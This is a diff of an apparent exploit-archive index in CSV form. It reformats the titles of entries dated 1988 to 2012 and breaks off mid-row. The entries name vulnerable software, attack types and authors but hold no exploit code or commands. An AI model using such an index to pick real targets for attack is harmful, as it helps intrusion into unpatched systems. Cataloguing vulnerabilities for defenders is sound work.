18722,platforms/cgi/webapps/18722.txt,"ZTE Change admin password",2012-04-08,"Nuevo Asesino",cgi,webapps,0 18723,platforms/multiple/remote/18723.rb,"Snort 2 DCE/RPC preprocessor Buffer Overflow",2012-04-09,metasploit,multiple,remote,0 18724,platforms/php/webapps/18724.rb,"Dolibarr ERP & CRM 3 Post-Auth OS Command Injection",2012-04-09,metasploit,php,webapps,0 18725,platforms/php/webapps/18725.txt,"Dolibarr ERP & CRM OS Command Injection",2012-04-09,"Nahuel Grisolia",php,webapps,0 -18726,platforms/windows/local/18726.py,"Mini-stream RM-MP3 Converter v3.1.2.2 Local Buffer Overflow",2012-04-09,"SkY-NeT SySteMs",windows,local,0 +18726,platforms/windows/local/18726.py,"Mini-stream RM-MP3 Converter 3.1.2.2 - Local Buffer Overflow",2012-04-09,"SkY-NeT SySteMs",windows,local,0 18727,platforms/windows/remote/18727.rb,"IBM Tivoli Provisioning Manager Express for Software Distribution Isig.isigCtl.1 ActiveX RunAndUploadFile() Method Overflow",2012-04-10,metasploit,windows,remote,0 18728,platforms/php/webapps/18728.txt,"joomla component The Estate Agent (com_estateagent) SQL injection Vulnerability",2012-04-10,xDarkSton3x,php,webapps,0 18729,platforms/php/webapps/18729.txt,"joomla component (com_bearleague) SQL injection Vulnerability",2012-04-10,xDarkSton3x,php,webapps,0 @@ -16194,11 +16194,11 @@ id,file,description,date,author,platform,type,port 18741,platforms/php/webapps/18741.txt,"joomla component (com_ponygallery) SQL injection Vulnerability",2012-04-15,xDarkSton3x,php,webapps,0 18742,platforms/php/webapps/18742.php,"NetworX CMS - CSRF Add Admin",2012-04-15,N3t.Crack3r,php,webapps,0 18743,platforms/php/webapps/18743.txt,"MediaXxx Adult Video / Media Script SQL Injection",2012-04-15,"Daniel Godoy",php,webapps,0 -18745,platforms/multiple/webapps/18745.txt,"ManageEngine Support Center Plus <=7903 Multiple Vulnerabilities",2012-04-15,xistence,multiple,webapps,0 +18745,platforms/multiple/webapps/18745.txt,"ManageEngine Support Center Plus <= 7903 - Multiple Vulnerabilities",2012-04-15,xistence,multiple,webapps,0 18747,platforms/windows/local/18747.rb,"CyberLink Power2Go name attribute (p2g) Stack Buffer Overflow Exploit",2012-04-18,metasploit,windows,local,0 18748,platforms/windows/local/18748.rb,"GSM SIM Editor 5.15 Buffer Overflow",2012-04-18,metasploit,windows,local,0 18749,platforms/osx/local/18749.py,"Office 2008 sp0 RTF Pfragments MAC exploit",2012-04-18,"Abhishek Lyall",osx,local,0 -18750,platforms/multiple/webapps/18750.txt,"Multiple Vulnerabilities in Scrutinizer NetFlow & sFlow Analyzer",2012-04-19,"Trustwave's SpiderLabs",multiple,webapps,0 +18750,platforms/multiple/webapps/18750.txt,"Scrutinizer NetFlow & sFlow Analyzer - Multiple Vulnerabilities",2012-04-19,"Trustwave's SpiderLabs",multiple,webapps,0 18751,platforms/hardware/dos/18751.txt,"Samsung D6000 TV Multiple Vulnerabilities",2012-04-19,"Luigi Auriemma",hardware,dos,0 18752,platforms/php/webapps/18752.txt,"Newscoop 3.5.3 Multiple Vulnerabilities",2012-04-19,"High-Tech Bridge SA",php,webapps,0 18753,platforms/php/webapps/18753.txt,"XOOPS 2.5.4 Multiple XSS Vulnerabilities",2012-04-19,"High-Tech Bridge SA",php,webapps,0 @@ -16216,8 +16216,8 @@ id,file,description,date,author,platform,type,port 18766,platforms/windows/webapps/18766.txt,"Oracle GlassFish Server - REST CSRF",2012-04-22,"Roberto Suggi Liverani",windows,webapps,0 18768,platforms/php/webapps/18768.txt,"Mega File Manager - File Download Vulnerability",2012-04-22,"i2sec-Min Gi Jo",php,webapps,0 18770,platforms/php/webapps/18770.txt,"vtiger CRM 5.1.0 Local File Inclusion",2012-04-22,Pi3rrot,php,webapps,0 -18771,platforms/windows/dos/18771.txt,"SumatraPDF v2.0.1 .chm and .mobi Memory Corruption",2012-04-23,shinnai,windows,dos,0 -18772,platforms/php/webapps/18772.txt,"Havalite CMS v1.0.4 Multiple Vulnerabilities",2012-04-23,Vulnerability-Lab,php,webapps,0 +18771,platforms/windows/dos/18771.txt,"SumatraPDF 2.0.1 - (.chm) & (.mobi) Memory Corruption",2012-04-23,shinnai,windows,dos,0 +18772,platforms/php/webapps/18772.txt,"Havalite CMS 1.0.4 - Multiple Vulnerabilities",2012-04-23,Vulnerability-Lab,php,webapps,0 18773,platforms/php/webapps/18773.txt,"ExponentCMS 2.0.5 Multiple Vulnerabilities",2012-04-23,"Onur Y?lmaz",php,webapps,0 18774,platforms/windows/dos/18774.txt,"Mobipocket Reader 6.2 Build 608 Buffer Overflow",2012-04-23,shinnai,windows,dos,0 18775,platforms/php/webapps/18775.php,"WebCalendar <= 1.2.4 (install/index.php) Remote Code Execution",2012-04-23,EgiX,php,webapps,0 @@ -16240,10 +16240,10 @@ id,file,description,date,author,platform,type,port 18798,platforms/php/webapps/18798.txt,"Soco CMS Local File Include Vulnerability",2012-04-29,"BHG Security Center",php,webapps,0 18799,platforms/windows/dos/18799.py,"Remote-Anything Player 5.60.15 Denial of Service",2012-04-29,"Saint Patrick",windows,dos,0 18800,platforms/php/webapps/18800.txt,"Alienvault OSSIM Open Source SIEM 3.1 Multiple Security Vulnerabilities",2012-04-29,"Stefan Schurtz",php,webapps,0 -18801,platforms/php/webapps/18801.txt,"Car Portal CMS v3.0 - Multiple Vulnerabilities",2012-04-30,Vulnerability-Lab,php,webapps,0 +18801,platforms/php/webapps/18801.txt,"Car Portal CMS 3.0 - Multiple Vulnerabilities",2012-04-30,Vulnerability-Lab,php,webapps,0 18802,platforms/asp/webapps/18802.txt,"C4B XPhone UC Web 4.1.890S R1 XSS Vulnerability",2012-04-30,Vulnerability-Lab,asp,webapps,0 -18803,platforms/php/webapps/18803.txt,"Opial CMS v2.0 Multiple Vulnerabilities",2012-04-30,Vulnerability-Lab,php,webapps,0 -18804,platforms/php/webapps/18804.txt,"DIY CMS v1.0 Poll Multiple Vulnerabilities",2012-04-30,Vulnerability-Lab,php,webapps,0 +18803,platforms/php/webapps/18803.txt,"Opial CMS 2.0 - Multiple Vulnerabilities",2012-04-30,Vulnerability-Lab,php,webapps,0 +18804,platforms/php/webapps/18804.txt,"DIY CMS 1.0 Poll - Multiple Vulnerabilities",2012-04-30,Vulnerability-Lab,php,webapps,0 18805,platforms/windows/remote/18805.txt,"McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 ActiveX GetObject() Exploit",2012-04-30,rgod,windows,remote,0 18806,platforms/php/webapps/18806.txt,"Wordpress Zingiri Web Shop Plugin <= 2.4.2 Persistent XSS",2012-05-01,"Mehmet Ince",php,webapps,0 18808,platforms/windows/local/18808.html,"SAMSUNG NET-i Viewer 1.37 SEH Overwrite",2012-05-01,Blake,windows,local,0 @@ -16252,7 +16252,7 @@ id,file,description,date,author,platform,type,port 18813,platforms/php/webapps/18813.txt,"OpenCart 1.5.2.1 Multiple Vulnerabilities",2012-05-01,waraxe,php,webapps,0 18814,platforms/php/webapps/18814.txt,"MyClientBase v0.12 - Multiple Vulnerabilities",2012-05-01,Vulnerability-Lab,php,webapps,0 18815,platforms/php/webapps/18815.txt,"STRATO Newsletter Manager Directory Traversal",2012-05-01,"Zero X",php,webapps,0 -18816,platforms/windows/dos/18816.py,"LAN Messenger <= v1.2.28 Denial of Service Vulnerability",2012-05-01,"Julien Ahrens",windows,dos,0 +18816,platforms/windows/dos/18816.py,"LAN Messenger <= 1.2.28 - Denial of Service Vulnerability",2012-05-01,"Julien Ahrens",windows,dos,0 18817,platforms/hardware/dos/18817.py,"Mikrotik Router Denial of Service",2012-05-01,PoURaN,hardware,dos,0 18818,platforms/windows/remote/18818.py,"Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit",2012-05-01,muts,windows,remote,0 18819,platforms/windows/dos/18819.cpp,"Microsoft Windows xp Win32k.sys Local Kernel DoS Vulnerability",2012-05-02,"Lufeng Li",windows,dos,0 @@ -16262,7 +16262,7 @@ id,file,description,date,author,platform,type,port 18824,platforms/cgi/webapps/18824.txt,"Websense Triton Multiple Vulnerabilities",2012-05-02,"Ben Williams",cgi,webapps,0 18825,platforms/windows/remote/18825.rb,"VLC MMS Stream Handling Buffer Overflow",2012-05-03,metasploit,windows,remote,0 18826,platforms/windows/local/18826.py,"AnvSoft Any Video Converter 4.3.6 Stack Overflow Exploit",2012-05-03,cikumel,windows,local,0 -18827,platforms/php/webapps/18827.txt,"Baby Gekko CMS v1.1.5c Multiple Stored XSS Vulnerabilities",2012-05-03,LiquidWorm,php,webapps,0 +18827,platforms/php/webapps/18827.txt,"Baby Gekko CMS 1.1.5c - Multiple Stored XSS Vulnerabilities",2012-05-03,LiquidWorm,php,webapps,0 18828,platforms/php/webapps/18828.txt,"PluXml 5.1.5 Local File Inclusion",2012-05-03,"High-Tech Bridge SA",php,webapps,0 18832,platforms/php/webapps/18832.txt,"Symantec Web Gateway Cross Site Scripting",2012-05-04,B00y@,php,webapps,0 18833,platforms/windows/remote/18833.rb,"Solarwinds Storage Manager 5.1.0 SQL Injection",2012-05-04,metasploit,windows,remote,0 @@ -16270,8 +16270,8 @@ id,file,description,date,author,platform,type,port 18836,platforms/php/remote/18836.py,"PHP CGI Argument Injection Exploit",2012-05-05,rayh4c,php,remote,0 18840,platforms/asp/webapps/18840.txt,"Fortinet FortiWeb Web Application Firewall Policy Bypass",2012-05-07,"Geffrey Velasquez",asp,webapps,0 18841,platforms/cgi/webapps/18841.txt,"Lynx Message Server Multiple Vulnerabilities",2012-05-07,"Mark Lachniet",cgi,webapps,0 -18842,platforms/php/webapps/18842.txt,"Genium CMS 2012|Q2 Multiple Vulnerabilities",2012-05-07,Vulnerability-Lab,php,webapps,0 -18843,platforms/php/webapps/18843.txt,"MYRE Real Estate Mobile 2012|2 Multiple Vulnerabilities",2012-05-07,Vulnerability-Lab,php,webapps,0 +18842,platforms/php/webapps/18842.txt,"Genium CMS 2012/Q2 - Multiple Vulnerabilities",2012-05-07,Vulnerability-Lab,php,webapps,0 +18843,platforms/php/webapps/18843.txt,"MYRE Real Estate Mobile 2012/2 Multiple Vulnerabilities",2012-05-07,Vulnerability-Lab,php,webapps,0 18844,platforms/php/webapps/18844.txt,"myCare2x CMS Multiple Vulnerabilities",2012-05-07,Vulnerability-Lab,php,webapps,0 18845,platforms/php/webapps/18845.txt,"PHP Agenda 2.2.8 SQLi Vulnerability",2012-05-07,loneferret,php,webapps,0 18847,platforms/windows/remote/18847.rb,"Firefox 7/8 (<= 8.0.1) nsSVGValue Out-of-Bounds Access Vulnerability",2012-05-09,metasploit,windows,remote,0 @@ -16288,18 +16288,18 @@ id,file,description,date,author,platform,type,port 18864,platforms/windows/dos/18864.txt,"QNX phrelay/phindows/phditto Multiple Vulnerabilities",2012-05-11,"Luigi Auriemma",windows,dos,0 18865,platforms/php/webapps/18865.rb,"WikkaWiki 1.3.2 Spam Logging PHP Injection",2012-05-12,metasploit,php,webapps,0 18866,platforms/windows/remote/18866.rb,"Distinct TFTP 3.01 Writable Directory Traversal Execution",2012-05-12,metasploit,windows,remote,0 -18868,platforms/php/webapps/18868.txt,"Sockso <=1.51 Persistent XSS",2012-05-12,"Ciaran McNally",php,webapps,0 +18868,platforms/php/webapps/18868.txt,"Sockso <= 1.51 - Persistent XSS",2012-05-12,"Ciaran McNally",php,webapps,0 18869,platforms/windows/local/18869.pl,"AnvSoft Any Video Converter 4.3.6 Unicode Buffer Overflow",2012-05-12,h1ch4m,windows,local,0 18870,platforms/windows/remote/18870.rb,"Firefox 8/9 AttributeChildRemoved() Use-After-Free",2012-05-13,metasploit,windows,remote,0 -18871,platforms/php/webapps/18871.txt,"Travelon Express CMS v6.2.2 Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,php,webapps,0 -18872,platforms/php/webapps/18872.txt,"Proman Xpress v5.0.1 Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,php,webapps,0 +18871,platforms/php/webapps/18871.txt,"Travelon Express CMS 6.2.2 - Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,php,webapps,0 +18872,platforms/php/webapps/18872.txt,"Proman Xpress 5.0.1 - Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,php,webapps,0 18873,platforms/php/webapps/18873.txt,"Viscacha Forum CMS v0.8.1.1 Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,php,webapps,0 -18874,platforms/php/webapps/18874.txt,"Free Realty v3.1-0.6 Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,php,webapps,0 +18874,platforms/php/webapps/18874.txt,"Free Realty 3.1-0.6 - Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,php,webapps,0 18875,platforms/php/webapps/18875.txt,"Galette (picture.php) SQL Injection Vulnerability",2012-05-13,sbz,php,webapps,0 18877,platforms/multiple/dos/18877.txt,"FlexNet License Server Manager Stack Overflow In lmgrd",2012-05-14,"Luigi Auriemma",multiple,dos,0 18878,platforms/windows/dos/18878.txt,"Pro-face Pro-Server EX WinGP PC Runtime Multiple Vulnerabilities",2012-05-14,"Luigi Auriemma",windows,dos,0 -18879,platforms/windows/dos/18879.rb,"Multimedia Builder 4.9.8 Malicious mef Crash",2012-05-15,"Ahmed Elhady Mohamed",windows,dos,0 -18881,platforms/java/webapps/18881.txt,"Liferay Portal 6.1 - 6.0.x Privilege Escalation",2012-05-13,"Jelmer Kuperus",java,webapps,0 +18879,platforms/windows/dos/18879.rb,"Multimedia Builder 4.9.8 - (.mef) DoS",2012-05-15,"Ahmed Elhady Mohamed",windows,dos,0 +18881,platforms/java/webapps/18881.txt,"Liferay Portal 6.1 - 6.0.x Privilege Escalation",2012-05-13,"Jelmer Kuperus",java,webapps,0 18882,platforms/php/webapps/18882.txt,"b2ePMS 1.0 Authentication Bypass Vulnerability",2012-05-15,"Jean Pascal Pereira",php,webapps,0 18884,platforms/php/webapps/18884.txt,"Serendipity 1.6 Backend XSS And SQLi Vulnerability",2012-05-08,"Stefan Schurtz",php,webapps,0 18885,platforms/linux/shellcode/18885.c,"linux/x86 execve(/bin/dash) 42 bytes",2012-05-16,X-h4ck,linux,shellcode,0 @@ -16307,16 +16307,16 @@ id,file,description,date,author,platform,type,port 18888,platforms/jsp/webapps/18888.txt,"OpenKM Document Management System 5.1.7 Command Execution",2012-01-03,"Cyrill Brunschwiler",jsp,webapps,0 18889,platforms/php/webapps/18889.txt,"Artiphp CMS 5.5.0 Database Backup Disclosure Exploit",2012-05-16,LiquidWorm,php,webapps,0 18890,platforms/multiple/dos/18890.txt,"Trigerring Java Code from a SVG Image",2012-05-16,"Nicolas Gregoire",multiple,dos,0 -18892,platforms/windows/local/18892.txt,"SkinCrafter ActiveX Control version 3.0 Buffer Overflow",2012-05-17,"saurabh sharma",windows,local,0 +18892,platforms/windows/local/18892.txt,"SkinCrafter ActiveX Control 3.0 - Buffer Overflow",2012-05-17,"saurabh sharma",windows,local,0 18893,platforms/hardware/remote/18893.py,"HP VSA Remote Command Execution Exploit",2012-02-17,"Nicolas Gregoire",hardware,remote,0 18894,platforms/windows/dos/18894.txt,"Windows XP Keyboard Layouts Pool Corruption LPE 0day PoC (post-MS12-034)",2012-05-18,Cr4sh,windows,dos,0 18896,platforms/multiple/remote/18896.rb,"Squiggle 1.7 SVG Browser Java Code Execution",2012-05-19,metasploit,multiple,remote,0 18897,platforms/windows/remote/18897.rb,"Oracle Weblogic Apache Connector POST Request Buffer Overflow",2012-05-19,metasploit,windows,remote,0 18898,platforms/php/remote/18898.rb,"Active Collab ""chat module"" <= 2.3.8 Remote PHP Code Injection Exploit",2012-05-19,metasploit,php,remote,0 18899,platforms/php/webapps/18899.txt,"PHP Address Book 7.0.0 Multiple Vulnerabilities",2012-05-19,"Stefan Schurtz",php,webapps,0 -18900,platforms/php/webapps/18900.txt,"FreeNAC version 3.02 SQL Injection and XSS Vulnerabilties",2012-05-19,Blake,php,webapps,0 +18900,platforms/php/webapps/18900.txt,"FreeNAC 3.02 - SQL Injection and XSS Vulnerabilties",2012-05-19,Blake,php,webapps,0 18901,platforms/hardware/remote/18901.rb,"HP StorageWorks P4000 Virtual SAN Appliance Command Execution",2012-05-21,metasploit,hardware,remote,0 -18902,platforms/windows/dos/18902.rb,"Real-DRAW PRO 5.2.4 Import File Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0 +18902,platforms/windows/dos/18902.rb,"Real-DRAW PRO 5.2.4 Import File Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0 18903,platforms/windows/dos/18903.rb,"DVD-Lab Studio 1.25 DAL File Open Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0 18905,platforms/windows/local/18905.rb,"Foxit Reader 3.0 Open Execute Action Stack Based Buffer Overflow",2012-05-21,metasploit,windows,local,0 18908,platforms/php/webapps/18908.txt,"Vanilla Forums LatestComment 1.1 Plugin Persistent XSS",2012-05-18,"Henry Hoggard",php,webapps,0 @@ -16338,7 +16338,7 @@ id,file,description,date,author,platform,type,port 18926,platforms/windows/dos/18926.php,"bsnes v0.87 Local Denial Of Service",2012-05-25,"Yakir Wizman",windows,dos,0 18927,platforms/php/webapps/18927.txt,"SocialEngine 4.2.2 Multiple Vulnerabilities",2012-05-25,i4k,php,webapps,0 18929,platforms/windows/remote/18929.rb,"RabidHamster R4 Log Entry sprintf() Buffer Overflow",2012-05-25,metasploit,windows,remote,0 -18931,platforms/hardware/dos/18931.rb,"iOS <= v5.1.1 Safari Browser JS match(), search() Crash PoC",2012-05-25,"Alberto Ortega",hardware,dos,0 +18931,platforms/hardware/dos/18931.rb,"iOS <= 5.1.1 Safari Browser - JS match(), search() Crash PoC",2012-05-25,"Alberto Ortega",hardware,dos,0 18932,platforms/linux/remote/18932.py,"Symantec Web Gateway 5.0.2 Remote LFI Root Exploit",2012-05-26,muts,linux,remote,0 18933,platforms/windows/remote/18933.rb,"QuickShare File Share 1.2.1 Directory Traversal Vulnerability",2012-05-27,metasploit,windows,remote,0 18934,platforms/php/webapps/18934.rb,"WeBid converter.php Remote PHP Code Injection",2012-05-27,metasploit,php,webapps,0 @@ -16351,14 +16351,14 @@ id,file,description,date,author,platform,type,port 18945,platforms/windows/dos/18945.txt,"WinRadius Server 2009 Denial Of Service",2012-05-29,demonalex,windows,dos,0 18946,platforms/windows/dos/18946.txt,"Tftpd32 DNS Server 4.00 Denial Of Service",2012-05-29,demonalex,windows,dos,0 18947,platforms/windows/local/18947.rb,"ispVM System XCF File Handling Overflow",2012-05-29,metasploit,windows,local,0 -18948,platforms/php/webapps/18948.txt,"PBBoard v2.1.4 Multiple SQL Injection Vulnerabilities",2012-05-29,loneferret,php,webapps,0 -18950,platforms/php/webapps/18950.txt,"NewsAdd <=1.0 Multiple SQL Injection Vulnerabilities",2012-05-30,WhiteCollarGroup,php,webapps,0 +18948,platforms/php/webapps/18948.txt,"PBBoard 2.1.4 - Multiple SQL Injection Vulnerabilities",2012-05-29,loneferret,php,webapps,0 +18950,platforms/php/webapps/18950.txt,"NewsAdd <= 1.0 - Multiple SQL Injection Vulnerabilities",2012-05-30,WhiteCollarGroup,php,webapps,0 18952,platforms/windows/dos/18952.txt,"Microsoft Wordpad 5.1 (.doc) Null Pointer Dereference Vulnerability",2012-05-30,condis,windows,dos,0 18953,platforms/php/webapps/18953.txt,"Ganesha Digital Library 4.0 Multiple Vulnerabilities",2012-05-30,X-Cisadane,php,webapps,0 18954,platforms/windows/local/18954.rb,"MPlayer SAMI Subtitle File Buffer Overflow",2012-05-30,metasploit,windows,local,0 18955,platforms/php/webapps/18955.txt,"Simple Web Content Management System 1.1-1.3 Multiple SQL Injection",2012-05-30,loneferret,php,webapps,0 18956,platforms/windows/dos/18956.c,"GIMP 2.6 script-fu < 2.8.0 Buffer Overflow Vulnerability",2012-05-31,"Joseph Sheridan",windows,dos,0 -18957,platforms/php/webapps/18957.rb,"PHP Volunteer Management System v1.0.2 Arbitrary File Upload",2012-05-31,metasploit,php,webapps,0 +18957,platforms/php/webapps/18957.rb,"PHP Volunteer Management System 1.0.2 - Arbitrary File Upload",2012-05-31,metasploit,php,webapps,0 18958,platforms/windows/dos/18958.html,"Sony VAIO Wireless Manager 4.0.0.0 Buffer Overflows",2012-05-31,"High-Tech Bridge SA",windows,dos,0 18959,platforms/multiple/local/18959.txt,"Browser Navigation Download Trick",2012-05-31,"Michal Zalewski",multiple,local,0 18960,platforms/php/webapps/18960.txt,"NewsAdd <= 1.0 (lerNoticia.php id) SQL Injection Vulnerability",2012-05-31,"Yakir Wizman",php,webapps,0 @@ -16429,7 +16429,7 @@ id,file,description,date,author,platform,type,port 19038,platforms/php/webapps/19038.rb,"Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability",2012-06-10,metasploit,php,webapps,0 19039,platforms/bsd/remote/19039,"BSD 4.2 fingerd buffer overflow Vulnerability",1988-10-01,Anonymous,bsd,remote,0 19040,platforms/solaris/remote/19040,"SunView (SunOS <= 4.1.1) selection_svc Vulnerability",1990-08-14,"Peter Shipley",solaris,remote,0 -19041,platforms/aix/dos/19041,"Digital Ultrix 4.0/4.1 /usr/bin/chroot Vulnerability",1991-05-01,Anonymous,aix,dos,0 +19041,platforms/aix/dos/19041,"Digital Ultrix 4.0/4.1 /usr/bin/chroot Vulnerability",1991-05-01,Anonymous,aix,dos,0 19042,platforms/solaris/dos/19042,"SunOS <= 4.1.1 /usr/release/bin/makeinstall Vulnerability",1999-11-23,Anonymous,solaris,dos,0 19043,platforms/aix/dos/19043,"SunOS <= 4.1.1 /usr/release/bin/winstall Vulnerability",1999-11-12,Anonymous,aix,dos,0 19044,platforms/solaris/remote/19044,"SunOS <= 4.1.3 LD_LIBRARY_PATH and LD_OPTIONS Vulnerability",1992-05-27,Anonymous,solaris,remote,0 @@ -16438,11 +16438,11 @@ id,file,description,date,author,platform,type,port 19047,platforms/aix/remote/19047,"Stalker Internet Mail Server 1.6 Buffer Overflow Vulnerability",2001-09-12,"David Luyer",aix,remote,0 19048,platforms/aix/remote/19048,"IRIX <= 6.4 pfdisplay.cgi Vulnerability",1998-04-07,"J.A. Gutierrez",aix,remote,0 19049,platforms/aix/dos/19049,"BSDI <= 4.0 tcpmux / inetd crash Vulnerability",1998-04-07,"Mark Schaefer",aix,dos,0 -19050,platforms/php/webapps/19050.txt,"Wordpress wp-gpx-map version 1.1.21 Arbitrary File Upload Vulnerability",2012-06-11,"Adrien Thierry",php,webapps,0 +19050,platforms/php/webapps/19050.txt,"Wordpress wp-gpx-map 1.1.21 - Arbitrary File Upload Vulnerability",2012-06-11,"Adrien Thierry",php,webapps,0 19051,platforms/php/webapps/19051.txt,"ClanSuite 2.9 Arbitrary File Upload Vulnerability",2012-06-11,"Adrien Thierry",php,webapps,0 -19052,platforms/php/webapps/19052.txt,"Wordpress User Meta Version 1.1.1 Arbitrary File Upload Vulnerability",2012-06-11,"Adrien Thierry",php,webapps,0 -19053,platforms/php/webapps/19053.txt,"Wordpress Top Quark Architecture Version 2.10 Arbitrary File Upload Vulnerability",2012-06-11,"Adrien Thierry",php,webapps,0 -19054,platforms/php/webapps/19054.txt,"Wordpress SfBrowser Version 1.4.5 Arbitrary File Upload Vulnerability",2012-06-11,"Adrien Thierry",php,webapps,0 +19052,platforms/php/webapps/19052.txt,"Wordpress User Meta 1.1.1 - Arbitrary File Upload Vulnerability",2012-06-11,"Adrien Thierry",php,webapps,0 +19053,platforms/php/webapps/19053.txt,"Wordpress Top Quark Architecture 2.10 - Arbitrary File Upload Vulnerability",2012-06-11,"Adrien Thierry",php,webapps,0 +19054,platforms/php/webapps/19054.txt,"Wordpress SfBrowser 1.4.5 - Arbitrary File Upload Vulnerability",2012-06-11,"Adrien Thierry",php,webapps,0 19055,platforms/php/webapps/19055.txt,"Wordpress Pica Photo Gallery 1.0 Arbitrary File Upload Vulnerability",2012-06-11,"Adrien Thierry",php,webapps,0 19056,platforms/php/webapps/19056.txt,"Wordpress Mac Photo Gallery 2.7 Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 19057,platforms/php/webapps/19057.txt,"Wordpress drag and drop file upload 0.1 Arbitrary File Upload Vulnerability",2012-06-11,"Adrien Thierry",php,webapps,0 @@ -16451,7 +16451,7 @@ id,file,description,date,author,platform,type,port 19060,platforms/php/webapps/19060.php,"TheBlog <= 2.0 Multiple Vulnerabilities",2012-06-11,WhiteCollarGroup,php,webapps,0 19064,platforms/hardware/dos/19064.txt,"F5 BIG-IP Remote Root Authentication Bypass Vulnerability",2012-06-11,"Florent Daigniere",hardware,dos,0 19065,platforms/php/webapps/19065.rb,"Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection",2012-06-12,metasploit,php,webapps,0 -19066,platforms/irix/local/19066,"SGI IRIX 5.3/6.2,SGI license_oeo 1.0 LicenseManager NETLS_LICENSE_FILE Vulnerability",1996-04-05,"Arthur Hagen",irix,local,0 +19066,platforms/irix/local/19066,"SGI IRIX 5.3/6.2,SGI license_oeo 1.0 LicenseManager NETLS_LICENSE_FILE Vulnerability",1996-04-05,"Arthur Hagen",irix,local,0 19067,platforms/irix/local/19067,"SGI IRIX <= 6.4,SGI license_oeo 3.0/3.1/3.1.1 LicenseManager LICENSEMGR_FILE_ROOT Vulnerability",1996-11-22,"Yuri Volobuev",irix,local,0 19068,platforms/unix/local/19068,"Digital UNIX 4.0/4.0 B/4.0 D SUID/SGID Core File Vulnerability",1998-04-06,"ru5ty and SoReN",unix,local,0 19069,platforms/linux/remote/19069,"Qualcomm Eudora Internet Mail Server 1.2 Buffer Overflow Vulnerability",1998-04-14,"Netstat Webmaster",linux,remote,0 @@ -16473,7 +16473,7 @@ id,file,description,date,author,platform,type,port 19085,platforms/linux/dos/19085.c,"Linux kernel 2.0/2.1 SIGIO Vulnerability",1998-06-30,"David Luyer",linux,dos,0 19086,platforms/linux/remote/19086.c,"wu-ftpd 2.4.2,SCO Open Server <= 5.0.5,ProFTPD 1.2 pre1 realpath Vulnerability (1)",1999-02-09,"smiler and cossack",linux,remote,21 19087,platforms/linux/remote/19087.c,"wu-ftpd 2.4.2,SCO Open Server <= 5.0.5,ProFTPD 1.2 pre1 realpath Vulnerability (2)",1999-02-09,"jamez and c0nd0r",linux,remote,21 -19089,platforms/windows/dos/19089.txt,"OpenType Font File Format DoS Exploit for Windows",2012-06-12,Cr4sh,windows,dos,0 +19089,platforms/windows/dos/19089.txt,"Windows OpenType Font - File Format DoS Exploit",2012-06-12,Cr4sh,windows,dos,0 19091,platforms/hardware/remote/19091.py,"F5 BIG-IP Remote Root Authentication Bypass Vulnerability",2012-06-12,"David Kennedy (ReL1K)",hardware,remote,0 19092,platforms/multiple/remote/19092.py,"MySQL Remote Root Authentication Bypass",2012-06-12,"David Kennedy (ReL1K)",multiple,remote,0 19093,platforms/multiple/remote/19093,"Allaire ColdFusion Server <= 4.0 Remote File Display, Deletion, Upload and Execution Vulnerability",1998-12-25,rain.forest.puppy,multiple,remote,0 @@ -16510,11 +16510,11 @@ id,file,description,date,author,platform,type,port 19128,platforms/solaris/local/19128.c,"Sun Solaris <= 7.0 sdtcm_convert Vulnerability",1998-10-23,UNYUN,solaris,local,0 19129,platforms/multiple/remote/19129,"Microsoft IIS 4.0,Microsoft Site Server 3.0 Showcode ASP Vulnerability",1999-05-07,L0pht,multiple,remote,0 19130,platforms/freebsd/local/19130.c,"FreeBSD <= 3.0 UNIX-domain panic Vulnerability",1999-05-05,"Lukasz Luzar",freebsd,local,0 -19131,platforms/windows/remote/19131.py,"XM Easy Personal FTP Server <= v5.30 Remote Format String Write4 Exploit",2012-06-14,mr_me,windows,remote,0 +19131,platforms/windows/remote/19131.py,"XM Easy Personal FTP Server <= 5.30 - Remote Format String Write4 Exploit",2012-06-14,mr_me,windows,remote,0 19132,platforms/php/webapps/19132.txt,"MYRE Real Estate Mobile 2012 Multiple Vulnerabilities",2012-06-14,Vulnerability-Lab,php,webapps,0 -19133,platforms/php/webapps/19133.txt,"Cells Blog CMS v1.1 Multiple Web Vulnerabilites",2012-06-14,Vulnerability-Lab,php,webapps,0 -19134,platforms/php/webapps/19134.txt,"Swoopo Gold Shop CMS v8.4.56 - Multiple Web Vulnerabilities",2012-06-14,Vulnerability-Lab,php,webapps,0 -19135,platforms/php/webapps/19135.txt,"Squirrelcart Cart Shop v3.3.4 Multiple Web Vulnerabilities",2012-06-14,Vulnerability-Lab,php,webapps,0 +19133,platforms/php/webapps/19133.txt,"Cells Blog CMS 1.1 - Multiple Web Vulnerabilites",2012-06-14,Vulnerability-Lab,php,webapps,0 +19134,platforms/php/webapps/19134.txt,"Swoopo Gold Shop CMS 8.4.56 - Multiple Web Vulnerabilities",2012-06-14,Vulnerability-Lab,php,webapps,0 +19135,platforms/php/webapps/19135.txt,"Squirrelcart Cart Shop 3.3.4 - Multiple Web Vulnerabilities",2012-06-14,Vulnerability-Lab,php,webapps,0 19137,platforms/hardware/dos/19137.rb,"Wyse Machine Remote Power off (DOS) without any privilege",2012-06-14,it.solunium,hardware,dos,0 19138,platforms/windows/local/19138.txt,"ESRI ArcGIS 10.0.X / ArcMap 9 Arbitrary Code Execution",2012-06-14,"Boston Cyber Defense",windows,local,0 19139,platforms/multiple/local/19139.py,"Adobe Illustrator CS5.5 Memory Corruption Exploit",2012-06-14,"Felipe Andres Manzano",multiple,local,0 @@ -16527,7 +16527,7 @@ id,file,description,date,author,platform,type,port 19147,platforms/windows/remote/19147,"NT IIS4 Remote Web-Based Administration Vulnerability",1999-01-14,Mnemonix,windows,remote,0 19149,platforms/windows/remote/19149.c,"NT IIS4 Log Avoidance Vulnerability",1999-01-22,Mnemonix,windows,remote,0 19152,platforms/windows/remote/19152,"Microsoft IIS 5.0 IISAPI 